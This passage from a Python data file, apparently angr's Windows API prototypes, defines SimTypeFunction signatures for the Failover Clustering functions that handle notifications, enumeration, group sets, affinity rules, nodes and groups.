'GetClusterNotifyV2': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), offset=0), SimTypePointer(SimStruct({"dwObjectType": SimTypeInt(signed=False, label="UInt32"), "FilterFlags": SimTypeLongLong(signed=True, label="Int64")}, name="NOTIFY_FILTER_AND_TYPE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lpdwNotifyKey", "pFilterAndType", "buffer", "lpbBufferSize", "lpszObjectId", "lpcchObjectId", "lpszParentId", "lpcchParentId", "lpszName", "lpcchName", "lpszType", "lpcchType", "dwMilliseconds"]),
#
'CreateClusterNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), arg_names=["hChange", "hCluster", "dwFilter", "dwNotifyKey"]),
#
'RegisterClusterNotify': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "dwFilterType", "hObject", "dwNotifyKey"]),
#
'GetClusterNotify': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hChange", "lpdwNotifyKey", "lpdwFilterType", "lpszName", "lpcchName", "dwMilliseconds"]),
#
'CloseClusterNotifyPort': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCHANGE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hChange"]),
#
'ClusterOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0), arg_names=["hCluster", "dwType"]),
#
'ClusterGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'ClusterEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'ClusterCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hEnum"]),
#
'ClusterOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "dwType", "pOptions"]),
#
'ClusterGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum"]),
#
'ClusterEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwType": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="CLUSTER_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum", "dwIndex", "pItem", "cbItem"]),
#
'ClusterCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hClusterEnum"]),
#
'CreateClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "groupSetName"]),
#
'OpenClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupSetName"]),
#
'CloseClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hGroupSet"]),
#
'DeleteClusterGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet"]),
#
'ClusterAddGroupToGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hGroup"]),
#
'ClusterAddGroupToGroupSetWithDomains': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hGroup", "faultDomain", "updateDomain"]),
#
'ClusterRemoveGroupFromGroupSet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup"]),
#
'ClusterGroupSetControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'AddClusterGroupDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroup", "hProviderGroup"]),
#
'SetGroupDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "lpszDependencyExpression"]),
#
'RemoveClusterGroupDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDependsOn"]),
#
'AddClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "hProviderGroupSet"]),
#
'SetClusterGroupSetDependencyExpression': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "lpszDependencyExprssion"]),
#
'RemoveClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSet", "hDependsOn"]),
#
'AddClusterGroupToGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroup", "hProviderGroupSet"]),
#
'RemoveClusterGroupToGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroup", "hDependsOn"]),
#
'ClusterGroupSetOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0), arg_names=["hCluster"]),
#
'ClusterGroupSetGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum"]),
#
'ClusterGroupSetEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum", "dwIndex", "lpszName", "lpcchName"]),
#
'ClusterGroupSetCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSETENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupSetEnum"]),
#
'AddCrossClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "lpRemoteClusterName", "lpRemoteGroupSetName"]),
#
'RemoveCrossClusterGroupSetDependency': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDependentGroupSet", "lpRemoteClusterName", "lpRemoteGroupSetName"]),
#
'CreateClusterAvailabilitySet': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwUpdateDomains": SimTypeInt(signed=False, label="UInt32"), "dwFaultDomains": SimTypeInt(signed=False, label="UInt32"), "bReserveSpareNode": SimTypeInt(signed=True, label="Int32")}, name="CLUSTER_AVAILABILITY_SET_CONFIG", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUPSET", pack=False, align=None), offset=0), arg_names=["hCluster", "lpAvailabilitySetName", "pAvailabilitySetConfig"]),
#
'ClusterNodeReplacement': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "lpszNodeNameCurrent", "lpszNodeNameNew"]),
#
'ClusterCreateAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="CLUS_AFFINITY_RULE_TYPE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "ruleType"]),
#
'ClusterRemoveAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName"]),
#
'ClusterAddGroupToAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "hGroup"]),
#
'ClusterRemoveGroupFromAffinityRule': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "ruleName", "hGroup"]),
#
'ClusterAffinityRuleControl': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hCluster", "affinityRuleName", "hHostNode", "dwControlCode", "lpInBuffer", "cbInBufferSize", "lpOutBuffer", "cbOutBufferSize", "lpBytesReturned"]),
#
'OpenClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName"]),
#
'OpenClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'OpenClusterNodeById': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), arg_names=["hCluster", "nodeId"]),
#
'CloseClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hNode"]),
#
'GetClusterNodeState': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="CLUSTER_NODE_STATE"), arg_names=["hNode"]),
#
'GetClusterNodeId': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "lpszNodeId", "lpcchName"]),
#
'GetClusterFromNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), arg_names=["hNode"]),
#
'PauseClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'ResumeClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'EvictClusterNode': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode"]),
#
'ClusterNetInterfaceOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszNodeName", "lpszNetworkName"]),
#
'ClusterNetInterfaceEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterfaceEnum", "dwIndex", "lpszName", "lpcchName"]),
#
'ClusterNetInterfaceCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNETINTERFACEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNetInterfaceEnum"]),
#
'ClusterNodeOpenEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0), arg_names=["hNode", "dwType"]),
#
'ClusterNodeOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0), arg_names=["hNode", "dwType", "pOptions"]),
#
'ClusterNodeGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "dwType": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0)}, name="CLUSTER_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum", "dwIndex", "pItem", "cbItem"]),
#
'ClusterNodeCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeGetEnumCount': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeCloseEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum"]),
#
'ClusterNodeEnum': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODEENUM", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNodeEnum", "dwIndex", "lpdwType", "lpszName", "lpcchName"]),
#
'EvictClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "dwTimeOut", "phrCleanupStatus"]),
#
'GetClusterResourceTypeKey': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["hCluster", "lpszTypeName", "samDesired"]),
#
'CreateClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName"]),
#
'OpenClusterGroup': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName"]),
#
'OpenClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName", "dwDesiredAccess", "lpdwGrantedAccess"]),
#
'PauseClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "bDrainNode", "dwPauseFlags", "hNodeDrainTarget"]),
#
'ResumeClusterNodeEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HNODE", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="CLUSTER_NODE_RESUME_FAILBACK_TYPE"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hNode", "eResumeFailbackType", "dwResumeFlagsReserved"]),
#
'CreateClusterGroupEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "groupType": SimTypeInt(signed=False, label="CLUSGROUP_TYPE")}, name="CLUSTER_CREATE_GROUP_INFO", pack=False, align=None), offset=0)], SimTypePointer(SimStruct({}, name="_HGROUP", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszGroupName", "pGroupInfo"]),
#
'ClusterGroupOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszProperties", "cbProperties", "lpszRoProperties", "cbRoProperties", "dwFlags"]),
#
'ClusterGroupGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx"]),
#
'ClusterGroupEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwVersion": SimTypeInt(signed=False, label="UInt32"), "cbId": SimTypeInt(signed=False, label="UInt32"), "lpszId": SimTypePointer(SimTypeChar(label="Char"), offset=0), "cbName": SimTypeInt(signed=False, label="UInt32"), "lpszName": SimTypePointer(SimTypeChar(label="Char"), offset=0), "state": SimTypeInt(signed=False, label="CLUSTER_GROUP_STATE"), "cbOwnerNode": SimTypeInt(signed=False, label="UInt32"), "lpszOwnerNode": SimTypePointer(SimTypeChar(label="Char"), offset=0), "dwFlags": SimTypeInt(signed=False, label="UInt32"), "cbProperties": SimTypeInt(signed=False, label="UInt32"), "pProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0), "cbRoProperties": SimTypeInt(signed=False, label="UInt32"), "pRoProperties": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="CLUSTER_GROUP_ENUM_ITEM", pack=False, align=None), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx", "dwIndex", "pItem", "cbItem"]),
#
'ClusterGroupCloseEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HGROUPENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hGroupEnumEx"]),
#
'ClusterResourceOpenEnumEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HCLUSTER", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0), arg_names=["hCluster", "lpszProperties", "cbProperties", "lpszRoProperties", "cbRoProperties", "dwFlags"]),
#
'ClusterResourceGetEnumCountEx': SimTypeFunction([SimTypePointer(SimStruct({}, name="_HRESENUMEX", pack=False, align=None), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hResourceEnumEx"]),
#
